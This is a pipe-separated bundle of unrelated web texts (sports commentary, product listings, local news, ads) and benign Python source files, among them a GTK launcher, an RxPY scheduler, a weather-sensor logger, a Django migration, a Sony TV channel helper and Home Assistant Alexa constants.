The proposal fixes two bad ideas — a Pac-12 title game nobody watches, and a Big 12 title game that’s automatically a rematch and arguably hurts the league’s Playoff chances — and replaces them with a joint Pac-12/Big 12 title game that lots of people would watch. Washington State can’t lose to an FCS team if it isn’t allowed to play any FCS teams.
See? All of that makes tons of sense.
If you do think about it for a few minutes, the idea’s impossible to execute.
For one, just about every power conference team needs to play at least seven home football games to balance its books, so playing three power opponents out of conference is financially impossible, as Big 12 commissioner Bob Bowlsby notes in Wilner’s article.
It’d be really hard for USC and Stanford to keep playing Notre Dame every year, or for Utah to keep playing BYU, or for anybody to keep dates with other big-name intersectional opponents (Texas would probably like to play scheduled games with Ohio State and Alabama, for example. And ESPN would probably like to broadcast them).
Head coaches would flip out, because they’d be forced to play dramatically harder schedules than their peers in the Big Ten, ACC, and (at least out of conference) SEC. The Playoff committee says it cares about strength of schedule but has shown it mainly cares about teams not losing, and all these teams would be at risk of more losses.
For as long as there’s a four-team playoff, that Pac-12/Big 12 title game is easily knocking one league out of contention every single year. And that assumes Pac-12 leader USC hasn’t already lost at Iowa State on a weeknight, which it probably has.
Screw it, though. This would be fun as hell. Look at all the fun matchups this kind of partnership would grant the college football world.
UCLA could play Kansas, with the winner’s basketball team advancing to the Sweet 16 automatically.
They could make Stanford fans go to either Ames or Morgantown every single year.
Colorado would get to play some of its historical rivals again.
Utah could start a new Holy War with Baylor.
Wazzu-WVU would have 95 points, and their fans would consume all the alcohol within a three-state radius of either Pullman or Morgantown.
I mean, fine, Texas-USC games are usually pretty good.
The Pac-12 and the Big Ten actually agreed to a slimmed-down version of this deal several years ago, before growing conference schedules and other logistical problems scuttled it.
If the Pac-12 wanted to pursue a smaller agreement with the Big 12 to get one game a season per team, or maybe even a little more, that’s probably doable, and it would have a positive effect on ticket sales and TV rights sales.
Or the Pac-12 could try for another agreement with the Big Ten. The league could also reach out to BYU to formalize a limited number of games a season. The Cougars already play multiple Pac-12 teams a season, and given the high number of Latter-Day Saints in many Pac-12 markets, would have no problems selling tickets. There are lots of other incremental decisions the league could probably make to shore up its product for the future.
The Big 12 could pursue similar deals of its own. Maybe with SEC, where Nick Saban’s been advocating for years for Power 5 teams to only play each other?
But that’s boring, and Pac-12 football is already too boring.
Let’s get experimental and weird.
Will it work? Probably not! Is it smart? Probably not! But sign that paperwork anyway. The world demands more Stanford-West Virginia football.
|
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from optparse import OptionParser
import gtk
from app import Application
from load import file_load
import data
import load
import save
def main():
    """Parse the command line, build the Application and run the GTK loop.

    Accepts at most one positional argument: a design file to load. Without
    one, the application starts with a freshly updated empty design.
    """
    usage = "usage: %prog [-c CRAPFILE] | [CRAPFILE]"
    parser = OptionParser(usage)
    (options, args) = parser.parse_args()
    if len(args) > 1:
        parser.error("incorrect number of arguments")
    app = Application()
    if len(args):
        file_load(app.design, args[0])
    else:
        app.design.update()
    # Common tail: show the window and enter the GTK main loop.
    app.show_app()
    gtk.main()
if __name__ == '__main__':
    # Optional psyco JIT acceleration; silently skipped when unavailable.
    try:
        import psyco
    except ImportError:
        pass
    else:
        psyco.full()
    main()
|
Pike fishing in the polders surrounding Stolwijk targets predatory fish using spinners, plugs and flies. With a fly rod, shallow water can be fished with streamers. In this typical Dutch polder countryside it is a great experience.
|
from abc import abstractmethod
from datetime import datetime
from typing import Optional
from rx.core import typing
from rx.disposable import Disposable, MultipleAssignmentDisposable
from .scheduler import Scheduler
class PeriodicScheduler(Scheduler, typing.PeriodicScheduler):
    """Base class for the various periodic scheduler implementations in this
    package as well as the mainloop sub-package.
    """
    def schedule_periodic(self,
                          period: typing.RelativeTime,
                          action: typing.ScheduledPeriodicAction,
                          state: Optional[typing.TState] = None
                          ) -> typing.Disposable:
        """Schedules a periodic piece of work.
        Args:
            period: Period in seconds or timedelta for running the
                work periodically.
            action: Action to be executed.
            state: [Optional] Initial state passed to the action upon
                the first iteration.
        Returns:
            The disposable object used to cancel the scheduled
            recurring action (best effort).
        """
        # Holds the disposable for the *next* scheduled tick; reassigning it
        # through MultipleAssignmentDisposable lets this one handle cancel
        # the whole recurring chain.
        disp: MultipleAssignmentDisposable = MultipleAssignmentDisposable()
        seconds: float = self.to_seconds(period)
        def periodic(scheduler: typing.Scheduler,
                     state: Optional[typing.TState] = None
                     ) -> Optional[Disposable]:
            # Stop rescheduling silently once the caller has disposed.
            if disp.is_disposed:
                return None
            # Record when the action started so its runtime can be
            # subtracted from the next delay, keeping ticks on a fixed grid.
            now: datetime = scheduler.now
            try:
                # The action returns the state for the next iteration.
                state = action(state)
            except Exception:
                # Cancel the recurrence, then propagate the error.
                disp.dispose()
                raise
            # Next delay = period minus the time the action just consumed.
            time = seconds - (scheduler.now - now).total_seconds()
            disp.disposable = scheduler.schedule_relative(time, periodic, state=state)
            return None
        # First tick fires after one full period; subsequent ticks
        # reschedule themselves from inside periodic().
        disp.disposable = self.schedule_relative(period, periodic, state=state)
        return disp
    @abstractmethod
    def schedule(self,
                 action: typing.ScheduledAction,
                 state: Optional[typing.TState] = None
                 ) -> typing.Disposable:
        """Schedules an action to be executed.
        Args:
            action: Action to be executed.
            state: [Optional] state to be given to the action function.
        Returns:
            The disposable object used to cancel the scheduled action
            (best effort).
        """
        return NotImplemented
    @abstractmethod
    def schedule_relative(self,
                          duetime: typing.RelativeTime,
                          action: typing.ScheduledAction,
                          state: Optional[typing.TState] = None
                          ) -> typing.Disposable:
        """Schedules an action to be executed after duetime.
        Args:
            duetime: Relative time after which to execute the action.
            action: Action to be executed.
            state: [Optional] state to be given to the action function.
        Returns:
            The disposable object used to cancel the scheduled action
            (best effort).
        """
        return NotImplemented
    @abstractmethod
    def schedule_absolute(self,
                          duetime: typing.AbsoluteTime,
                          action: typing.ScheduledAction,
                          state: Optional[typing.TState] = None
                          ) -> typing.Disposable:
        """Schedules an action to be executed at duetime.
        Args:
            duetime: Absolute time at which to execute the action.
            action: Action to be executed.
            state: [Optional] state to be given to the action function.
        Returns:
            The disposable object used to cancel the scheduled action
            (best effort).
        """
        return NotImplemented
|
Pro Pac Ultimates Chicken is formulated to be ideal for all breeds and sizes of dogs, providing a hearty, meat-based food with all the necessary nutrients. With chicken meat (one of the most natural meat sources for dogs) as the main ingredient (>20%), it is also combined with the benefits of whole grain rice (15%), and mixed fruits and vegetables (>12%). No artificial colours, flavours or preservatives. No by-products, corn, wheat, gluten or soy.
These have slightly damaged packaging and in some cases a loss of contents (as indicated). Food is in fine condition.
Chicken Meal (100% chicken meat), Brown Rice, White Rice, Rice Bran, Peas, Chicken Fat (Preserved with Mixed Tocopherols ), Beet Pulp, Flaxseed, Egg, Apples, Blueberries, Carrots, Spinach, Blueberry Fiber, Cranberry Fiber, DL-Methionine, L-Lysine, Taurine, Yucca, L-Carnitine, Beta-Carotene, Vitamins, Minerals.
Vitamin A 13.800 IU/kg, Vitamin D3 850 IU/kg, Vitamin C 35 mg/kg, Vitamin E (α-tocopherol) 100 IU/kg, Copper (copper sulfate) 20 mg/kg, Omega-6 >3.4%, Omega-3 >0.65%, Methionine 0.8 mg/kg, Lysine 1.1 mg/kg, Taurine 0.015%, L-Carnitine 15 mg/kg, Beta-Carotene 3 mg/kg.
Use the chart as a guide & adjust as necessary to maintain proper weight. Feeding portion may vary according to age, breed, climate & temperament. Fresh water is essential and should be available at all times.
Enter the quantity and click "add to cart". When you are ready to pay for your order proceed to checkout. Payment is made by credit card on a secure server alternatively you may pay by "bank deposit" or by phone on 0800 DOG FOOD (364 366).
For trade enquiries or bulk orders please contact us.
“Hi there, they loved it! I am now giving them the biscuits for their daytime feeds and only using wet food in the morning as they are still so young (7weeks today). I am thrilled with the price. I've heard about your cat line as well and am spreading the word.
Thanks for the samples, very welcome!
© Petfood Direct. All rights reserved.
|
#!/usr/bin/python
from Adafruit_BMP085 import BMP085
import re, os, rrdtool, time
# function: read and parse sensor data file
def read_sensor(path):
    """Read a DS18x20 1-wire ``w1_slave`` file and return the temperature.

    The file has two lines::

        XX XX XX XX XX XX XX XX XX : crc=XX YES
        XX XX XX XX XX XX XX XX XX t=<millidegrees>

    Returns the temperature in degrees Celsius as a string, or ``"U"``
    ("unknown", understood by rrdtool) when the file is unreadable or the
    CRC line does not report YES.
    """
    value = "U"
    try:
        # "with" guarantees the file is closed even when a read raises;
        # the original left the handle open on that path.
        with open(path, "r") as f:
            line = f.readline()
            if re.match(r"([0-9a-f]{2} ){9}: crc=[0-9a-f]{2} YES", line):
                line = f.readline()
                m = re.match(r"([0-9a-f]{2} ){9}t=([+-]?[0-9]+)", line)
                if m:
                    # t= is reported in 1/1000 degrees Celsius.
                    value = str(float(m.group(2)) / 1000.0)
    except IOError as e:
        # Same message the original Python 2 print statement produced.
        print(" ".join([time.strftime("%x %X"), "Error reading", path, ": ", str(e)]))
    return value
# define paths to 1-wire sensor data (outside temperature probe)
path = ("/sys/bus/w1/devices/10-0008002ff245/w1_slave")
# read sensor data
# NOTE(review): read_sensor() returns "U" on failure, which makes this
# float() call raise ValueError -- confirm whether a crash is intended here.
tempout = float(read_sensor(path))
time.sleep(1)
#########################################################################
# Initialise the BMP085 and use STANDARD mode
bmp = BMP085(0x77)
tempin = bmp.readTemperature()
# Read the current barometric pressure level
pressure = bmp.readPressure()
# Set the altitude of your current location in meter
altitude = 301
# Reduce station pressure to sea level (international barometric formula).
psea = pressure / pow(1.0 - altitude/44330.0, 5.255)
# Python 2 print statements; readPressure() reports pascals, hence /100 -> hPa.
print "Outside Temp: %.2f C" % tempout
print "Inside Temp: %.2f C" % tempin
print "Pressure: %.2f hPa" % (pressure / 100.0)
print "Pressure at sea level: %8.2f hPa" % (psea / 100.0)
time.sleep(1)
# insert data into round-robin-database (weather.rrd next to this script);
# "N" timestamps the sample with rrdtool's notion of "now".
data = "N:%.2f:%.2f:%8.2f" % (tempin, tempout, psea/100.0)
rrdtool.update(
    "%s/weather.rrd" % (os.path.dirname(os.path.abspath(__file__))),
    data)
|
I was amazed with the outcome of the Animal Tales Fundraising Program at Cheras LeisureMall that started last month. It was a fundraising initiative in partnership with Crayola Malaysia to support SPCA Selangor’s animal welfare advocacy and to create ‘The Biggest Mosaic Made of Crayons’ for the Malaysia Book of Records, as well as the Guinness World Records, to raise awareness on animal welfare issues.
This initiative, in partnership with Crayola Malaysia, truly sparked creativity and built community engagement. The animals look as if they are ‘alive’, ‘roaming free’ on a giant safari mosaic made of recycled crayons.
Artistically constructed at Level 2 Cravings Lane, Cheras LeisureMall, the giant mosaic — depicting a harmonious group of animals living in the wild and measuring 10.28 metres in length and 6.97 metres in width — captivates shoppers.
The animals are brought to life with 3 tonnes of recycled crayon pieces and 2,270 mini mosaics, the masterpiece is a result of a community engagement initiative, whereby more than 2,000 participants of all walks of life from as young as a 4-year old child to an 80-year old participant who came together through a common passion for animal welfare issues.
Animal Tales Fundraising Program was held from 15 – 31 July 2017, where participants had the opportunity to build mini mosaics using recycled Crayola crayon pieces with a participation fee of RM10 each. The mini mosaics were then combined and repurposed to create the ‘Biggest Mosaic Made of Crayons’, which became an iconic showpiece at Cheras LeisureMall to raise public awareness about animal protection and conservation.
Cheras LeisureMall is working closely with the Society for Prevention of Cruelty to Animals (SPCA) Selangor, the beneficiary of this initiative, the giant mosaic also seeks to encourage and instill compassion, respect, and empathy towards animals, so that all living creatures may live together in harmony.
This initiative not only gives a great experience to the customers but also instill greater awareness on the importance of humane treatment to animals. It garnered tremendous support from the community, as Cheras LeisureMall managed to raise RM22,500 from the fundraising drive, and PPB Group Berhad (the management of Cheras LeisureMall) will contribute an equivalent amount to channel a total of RM45,000 to SPCA Selangor.
Cheras LeisureMall was awarded the ‘Biggest Mosaic Made of Crayons’ in Malaysia by the Malaysia Book of Records (MBR) upon the evaluation by MBR representatives at the kick-off event. Both Cheras LeisureMall and Crayola Malaysia are also in the midst of submitting for the Guinness Book of Records’ accreditation. The giant mosaic is now on display at Cheras LeisureMall for public viewing.
Animal Tales Fundraising Program is Cheras LeisureMall’s maiden animal welfare-driven initiative aimed at championing the noble cause of animal conservation and protection. It is also aligned with Cheras LeisureMall’s commitment to promote community-driven activities by contributing and engaging with the communities in which the company operates, and with the society at large.
Very nice mosaic artwork, nice to meet your there too.
Wow~ Impress with their talented drawing here.
Say no to animal cruelty. A good charity to create awareness to the public and help the animals in the world.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-09-04 17:41
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated initial migration for the economy app: a polymorphic
    # Transaction base table plus four multi-table-inheritance children.
    # Generated code -- do not hand-edit the operations.
    initial = True
    dependencies = [
        ('contenttypes', '0002_remove_content_type_name'),
    ]
    operations = [
        # Base ledger entry; `balance` denormalizes the running total.
        migrations.CreateModel(
            name='Transaction',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('user_email', models.EmailField(max_length=254)),
                ('delta', models.IntegerField()),
                ('note', models.TextField(blank=True, null=True)),
                ('balance', models.PositiveIntegerField(help_text='The balance total at this point in the log. This value exists strictly for performance reasons when calculating current balance.')),
                ('created', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                'abstract': False,
            },
        ),
        # Child tables share the base row through transaction_ptr (MTI).
        migrations.CreateModel(
            name='AdministrativeTransaction',
            fields=[
                ('transaction_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='economy.Transaction')),
            ],
            options={
                'abstract': False,
            },
            bases=('economy.transaction',),
        ),
        migrations.CreateModel(
            name='ForexTransaction',
            fields=[
                ('transaction_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='economy.Transaction')),
                ('currency_value', models.PositiveIntegerField()),
                ('credits_purchased', models.PositiveIntegerField()),
            ],
            options={
                'abstract': False,
            },
            bases=('economy.transaction',),
        ),
        migrations.CreateModel(
            name='ItemPurchaseTransaction',
            fields=[
                ('transaction_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='economy.Transaction')),
                ('quantity', models.PositiveIntegerField(help_text='Number of items purchased')),
            ],
            options={
                'abstract': False,
            },
            bases=('economy.transaction',),
        ),
        migrations.CreateModel(
            name='SpoilsTransaction',
            fields=[
                ('transaction_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='economy.Transaction')),
            ],
            options={
                'abstract': False,
            },
            bases=('economy.transaction',),
        ),
        # Content-type pointer used by django-polymorphic to recover the
        # concrete subclass of each Transaction row.
        migrations.AddField(
            model_name='transaction',
            name='polymorphic_ctype',
            field=models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_economy.transaction_set+', to='contenttypes.ContentType'),
        ),
    ]
|
Are you looking for reliable and trustworthy packers and movers in Kondapur? Then you have come to the right place: we are known as the best packers and movers in the Kondapur area and nearby. We offer the following packing and moving services to everyone staying in Kondapur: Packing and Unpacking Services, Loading and Unloading Services, Household Goods Moving Services, Door to Door Shifting Services, Office Relocation Services, and Car Transportation Services to all residents and offices located in the Kondapur area.
Transmove Relocation has well-trained and experienced packers who take great care with the valuables you are shifting. First we segregate the products that are fragile, easily damaged or costly and pack them in bubble wrap and cartons so that they will not be damaged easily. When moving the products, we shift household as well as office furniture from Kondapur to any part of the country in closed containers so that external environmental factors have no impact on them. We have successfully executed thousands of house shiftings in the Kondapur area.
Transmove is known for quality packers and movers service in Kondapur and Hyderabad areas we know each and every area in Kondapur , it is easy to find your location in Kondapur area for packing your house holds and office goods from door step in Kondapur .
We pack and move household items from Kondapur to any part of India; some of the destinations we move to on a regular basis are Bangalore, Chennai, Kolkata, Pune, Delhi, Bhopal, Kerala, etc.
Just call us for packing and moving in Kondapur we will be at your place we give quote, take order, shift on date required and move the goods to desired location and unpack them at your new destination from Kondapur . The Process is simple when you choose transmove relocation services . for best experience please call us for all packers and movers in Kondapur .
|
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 22 11:55:10 2016
@author: liys
"""
import pickle, sqlite3
from queue import PriorityQueue
import matplotlib.pyplot as plt
from OffRoadPlanning import load_forward_path_primitives, load_reverse_path_primitives, test_load_path_primitives, \
test_load_motion_primitives, State
# test_load_path_primitives()
# test_load_motion_primitives()
# primitives1 = load_forward_path_primitives()
# primitives2 = load_reverse_path_primitives()
# Load precomputed motion primitives keyed for State.ControlSet expansion.
motion_primitives = {}
with open('motion_primitives2.pickle', 'rb') as f:
    motion_primitives.update(pickle.load(f))
# NOTE(review): this cursor is opened but never used before being closed
# below -- confirm whether the InitialGuessTable lookup was meant to happen.
conn = sqlite3.connect('InitialGuessTable.db')
cursor = conn.cursor()
# Seed the best-first search from a fixed start state.
start = State(index=(50,50,-5,-1), time=10., length=50., cost=0.)
pq = PriorityQueue()
pq.put(start)
node_dict = {start.index:start}
edge_dict = {}
times = 0
# Expand at most 100 states (or until the frontier empties).
while times < 100 and not pq.empty():
    times += 1
    state = pq.get()
    print(state.index)
    State.ControlSet(state, motion_primitives, pq, node_dict, edge_dict)
print(len(edge_dict))
# Plot expanded trajectories (columns 2,3 presumably hold x,y -- TODO confirm)
# and the expanded nodes as red dots.
for traj in edge_dict.values():
    plt.plot(traj[:,2], traj[:,3])
for state in node_dict.values():
    plt.plot(state.state[0], state.state[1], 'ro')
#    print(state.priority)
plt.axis('equal')
plt.show()
cursor.close()
conn.close()
|
Cathrin makes her living by sewing.
Old sent a telegram to Huashi.
Laurent is holding something behind his back.
Are you really going on the date with Butler?
Soohong didn't really feel like going to school this morning.
Varda said that he and Gregor can't come to our party.
Celeste was worried that Raymond's words were indirectly aimed at her, but in truth he was only talking about himself in a self-deprecating manner.
Did you really threaten to kill The?
How much was Tharen making on his last job?
Elaine is an avid tennis player.
Thuan plans to go in spite of the bad weather.
Who's going to tell Seth they can't do that?
Sam asked Roderick many questions that she couldn't answer.
They zapped Gail with the defibrillator.
Piercarlo was just a kid at that time.
Jennie told me he wasn't happy here.
Alexis tried to climb over the fence.
Joubert isn't very obedient, is he?
Moses helped the little old lady to cross the road.
Diana made us feel welcome.
Fritz jumped out of his bed.
How did you know Walter would do that?
Huashi wanted to learn to swim.
Srinivasan stayed with his father.
I don't like the way Miriamne did that.
|
# -*- coding: utf-8 -*-
#
# SonyAPI
# External control of Sony Bravia Generation 3 TV's
# Copyright (C) 2017 Kevin G. Schlosser
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from __future__ import absolute_import
from . import media
from .api_const import PY2
class Channels(object):
    """Channel helper for a SonyAPI instance.

    Behaves like the current channel number (int/str conversion, comparison
    and arithmetic operators) and supports zapping up/down with wrap-around.
    """

    # Sentinel meaning "no candidate found yet" when searching upwards;
    # must be larger than any real channel number.
    _UP_SENTINEL = 999999

    def __init__(self, sony_api):
        self._sony_api = sony_api

    @property
    def _channel(self):
        # Channel number the TV is currently displaying.
        return self._sony_api.now_playing.display_num

    @property
    def lineup(self):
        """Return a list of media.ContentItem for every channel of every
        'tv*' source reported by the device."""
        content_items = []
        for source in self._sony_api.source_list:
            if source.uri.startswith('tv'):
                content_list = self._sony_api.send(
                    'avContent',
                    'getContentList',
                    source=source.uri
                )
                for content in content_list:
                    content['source'] = source
                    content_items += [
                        media.ContentItem(self._sony_api, **content)
                    ]
        return content_items

    def _set_channel(self, direction, channel):
        """Tune to ``channel``, or the nearest channel in ``direction``
        ('up'/'down'), wrapping around the lineup at either end.

        Returns the channel number on an exact match, the selected
        ContentItem otherwise, or None when the lineup is empty.
        """
        # Fetch the lineup once instead of once per loop (each access
        # performs a device round-trip).
        lineup = self.lineup
        for chan in lineup:
            if chan.display_num == str(channel):
                chan.set()
                return channel

        selected_channel = None
        new_channel = self._UP_SENTINEL if direction == 'up' else 0

        for chan in lineup:
            if direction == 'up':
                # Smallest channel number strictly above the target.
                if new_channel > int(chan.display_num) > channel:
                    selected_channel = chan
                    new_channel = int(chan.display_num)
            else:
                # Largest channel number strictly below the target.
                if new_channel < int(chan.display_num) < channel:
                    selected_channel = chan
                    new_channel = int(chan.display_num)

        # BUG FIX: the original compared against 999999999 while the
        # sentinel was 999999, so zapping up past the highest channel never
        # wrapped and returned None instead of the lowest channel.
        if new_channel == self._UP_SENTINEL:
            for chan in lineup:
                if new_channel > int(chan.display_num):
                    selected_channel = chan
                    new_channel = int(chan.display_num)
        if new_channel == 0:
            # Nothing below the target: wrap to the highest channel.
            for chan in lineup:
                if new_channel < int(chan.display_num):
                    selected_channel = chan
                    new_channel = int(chan.display_num)

        if selected_channel is not None:
            selected_channel.set()
        return selected_channel

    def up(self):
        """Zap to the next channel upwards (wraps at the top)."""
        return self._set_channel('up', int(self._channel) + 1)

    def down(self):
        """Zap to the next channel downwards (wraps at the bottom)."""
        return self._set_channel('down', int(self._channel) - 1)

    # The comparison/arithmetic operators treat this object as the current
    # channel number.
    def __lt__(self, other):
        return int(self._channel) < int(other)

    def __le__(self, other):
        return int(self._channel) <= int(other)

    def __eq__(self, other):
        return int(self._channel) == int(other)

    def __ne__(self, other):
        return int(self._channel) != int(other)

    def __gt__(self, other):
        return int(self._channel) > int(other)

    def __ge__(self, other):
        return int(self._channel) >= int(other)

    def __add__(self, other):
        return int(self._channel) + int(other)

    def __sub__(self, other):
        return int(self._channel) - int(other)

    def __mul__(self, other):
        return int(self._channel) * int(other)

    def __div__(self, other):
        return int(self._channel) / int(other)

    # The in-place operators actually zap the TV to the computed channel.
    def __iadd__(self, other):
        return self._set_channel('up', int(self._channel) + int(other))

    def __isub__(self, other):
        return self._set_channel('down', int(self._channel) - int(other))

    def __imul__(self, other):
        return self._set_channel('up', int(self._channel) * int(other))

    def __idiv__(self, other):
        return self._set_channel('down', int(self._channel) / int(other))

    def __int__(self):
        return int(self._channel)

    def __str__(self):
        return str(self._channel)

    if PY2:
        def __unicode__(self):
            return unicode(str(self))
|
The Aquis Gold Coast Titans have had five players selected in the Australian Prime Minister’s XIII train-on squad, including rookie halfback Kane Elgey.
The Australian Rugby League Commission named the squad this afternoon. Titans players included are Elgey, James Roberts, Kierran Moseley, Ryan James and Beau Falloon.
The squad, which will be coached by Penrith Panthers’ Ivan Cleary, has been selected from the teams which will not take part in the finals series. More players will be added from the teams eliminated from the finals this weekend.
The final team will be announced on September 15 for the match which will be played in Port Moresby on Saturday, September 26.
There is no other international activity for Australian players this year, while New Zealand will tour England in October-November.
Cleary, who will coach the Prime Minister’s XIII for the first time, said he was excited to work with a squad featuring such talent.
“I’m very grateful for the opportunity, and I’m particularly looking forward to working with some of the younger players who have bright futures,” he said.
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import collections
import numpy as np
from . import dusts
__ver__ = '1.0'
class sfh_wrapper(object):
    """ sfh_wrapper class. EzGal wraps this class around the sfh function. It takes care of the
    details of passing or not passing parameters """

    func = ''  # sfh function
    args = ()  # extra arguments to pass on call
    has_args = False  # whether or not there are actually any extra arguments

    def __init__(self, function, args):
        """ wrapper_obj = ezgal.sfhs.wrapper( function, args )

        Store the star-formation-history callable and any extra arguments to
        forward on every call. ``args`` is only honored when it is a
        non-empty tuple. """
        self.func = function
        # isinstance() replaces the unidiomatic ``type(args) == type(())``.
        if isinstance(args, tuple) and len(args) > 0:
            self.has_args = True
            self.args = args

    def __call__(self, val):
        """ Evaluate the wrapped SFH function at ``val``. """
        if self.has_args:
            return self.func(val, *self.args)
        return self.func(val)
class numeric(object):
    """Callable wrapper that turns a tabulated star formation history into a
    function of age, linearly interpolating between the given samples."""

    ages = np.array([])
    sfr = np.array([])

    def __init__(self, ages, sfr):
        """ numeric_obj = ezgal.sfhs.numeric( ages, sfrs )

        Store the age grid and the matching relative star formation rates.
        Ages should be in gyrs. """
        self.ages = np.asarray(ages)
        self.sfr = np.asarray(sfr)

    def __call__(self, val):
        """Return the star formation rate interpolated at age ``val``."""
        interpolated = np.interp(val, self.ages, self.sfr)
        return interpolated
def exponential(t, tau):
    """ ezgal.sfhs.exponential( ages, tau )

    Exponentially decaying star formation history with an e-folding time
    scale of ``tau`` gyrs. """
    return np.exp(-t / tau)
def constant(t, length):
    """ ezgal.sfhs.constant( ages, length )

    Burst of constant star formation from t=0 to t=length (gyrs).
    Accepts a scalar age or a numpy array of ages and returns 1.0 inside
    the burst and 0.0 after it, matching the input's shape. """
    # isinstance() replaces the unidiomatic ``type(t) == type(np.array([]))``
    # and np.where replaces the manual zeros/mask construction.
    if isinstance(t, np.ndarray):
        return np.where(t <= length, 1.0, 0.0)
    return 0.0 if t > length else 1.0
|
ala intellectual, structural, relationship capital.
their relationship(s) – contributory role to company products and services.
Exploiting a company’s internal and external ‘relationship capital’ should be a (fiduciary) priority… because relationship capital can serve as a key differentiator in any market space and ‘pocket book’!
those which don’t and should be for selling, licensing, transferring, bartering, discarding, or allow to merge into open sources.
Michael D. Moberly m.moberly@kpstrat.com St. Louis ‘Business Intangible Asset Blog’ since May 2006, 600+ published blog posts ‘where one’s attention span, businesses intangible assets, and solutions converge’.
Effective Management Of Intangible Assets Is 'Mission Critical'!
|
"""Constants for the Alexa integration."""
from collections import OrderedDict
from homeassistant.const import TEMP_CELSIUS, TEMP_FAHRENHEIT
from homeassistant.components.climate import const as climate
from homeassistant.components import fan
DOMAIN = "alexa"
# Flash briefing constants
CONF_UID = "uid"
CONF_TITLE = "title"
CONF_AUDIO = "audio"
CONF_TEXT = "text"
CONF_DISPLAY_URL = "display_url"
CONF_FILTER = "filter"
CONF_ENTITY_CONFIG = "entity_config"
CONF_ENDPOINT = "endpoint"
CONF_CLIENT_ID = "client_id"
CONF_CLIENT_SECRET = "client_secret"
# Flash briefing response attribute names (Alexa JSON keys).
ATTR_UID = "uid"
ATTR_UPDATE_DATE = "updateDate"
ATTR_TITLE_TEXT = "titleText"
ATTR_STREAM_URL = "streamUrl"
ATTR_MAIN_TEXT = "mainText"
ATTR_REDIRECTION_URL = "redirectionURL"
SYN_RESOLUTION_MATCH = "ER_SUCCESS_MATCH"
# Timestamp format required by the flash briefing updateDate field.
DATE_FORMAT = "%Y-%m-%dT%H:%M:%S.0Z"
# Smart Home API message envelope keys.
API_DIRECTIVE = "directive"
API_ENDPOINT = "endpoint"
API_EVENT = "event"
API_CONTEXT = "context"
API_HEADER = "header"
API_PAYLOAD = "payload"
API_SCOPE = "scope"
API_CHANGE = "change"
CONF_DESCRIPTION = "description"
CONF_DISPLAY_CATEGORIES = "display_categories"
# Map Home Assistant temperature units onto the Alexa scale names.
API_TEMP_UNITS = {TEMP_FAHRENHEIT: "FAHRENHEIT", TEMP_CELSIUS: "CELSIUS"}
# Needs to be ordered dict for `async_api_set_thermostat_mode` which does a
# reverse mapping of this dict and we want to map the first occurrence of OFF
# back to HA state.
API_THERMOSTAT_MODES = OrderedDict(
    [
        (climate.HVAC_MODE_HEAT, "HEAT"),
        (climate.HVAC_MODE_COOL, "COOL"),
        (climate.HVAC_MODE_HEAT_COOL, "AUTO"),
        (climate.HVAC_MODE_AUTO, "AUTO"),
        (climate.HVAC_MODE_OFF, "OFF"),
        (climate.HVAC_MODE_FAN_ONLY, "OFF"),
        (climate.HVAC_MODE_DRY, "CUSTOM"),
    ]
)
API_THERMOSTAT_MODES_CUSTOM = {climate.HVAC_MODE_DRY: "DEHUMIDIFY"}
API_THERMOSTAT_PRESETS = {climate.PRESET_ECO: "ECO"}
# Fan speed translations: HA named speeds <-> Alexa percentage / range values.
PERCENTAGE_FAN_MAP = {
    fan.SPEED_OFF: 0,
    fan.SPEED_LOW: 33,
    fan.SPEED_MEDIUM: 66,
    fan.SPEED_HIGH: 100,
}
RANGE_FAN_MAP = {
    fan.SPEED_OFF: 0,
    fan.SPEED_LOW: 1,
    fan.SPEED_MEDIUM: 2,
    fan.SPEED_HIGH: 3,
}
# Inverse of RANGE_FAN_MAP: Alexa range value -> HA named speed.
SPEED_FAN_MAP = {
    0: fan.SPEED_OFF,
    1: fan.SPEED_LOW,
    2: fan.SPEED_MEDIUM,
    3: fan.SPEED_HIGH,
}
class Cause:
    """Possible causes for property changes.

    String values sent verbatim in Alexa change-report events.
    https://developer.amazon.com/docs/smarthome/state-reporting-for-a-smart-home-skill.html#cause-object
    """
    # Indicates that the event was caused by a customer interaction with an
    # application. For example, a customer switches on a light, or locks a door
    # using the Alexa app or an app provided by a device vendor.
    APP_INTERACTION = "APP_INTERACTION"
    # Indicates that the event was caused by a physical interaction with an
    # endpoint. For example manually switching on a light or manually locking a
    # door lock
    PHYSICAL_INTERACTION = "PHYSICAL_INTERACTION"
    # Indicates that the event was caused by the periodic poll of an appliance,
    # which found a change in value. For example, you might poll a temperature
    # sensor every hour, and send the updated temperature to Alexa.
    PERIODIC_POLL = "PERIODIC_POLL"
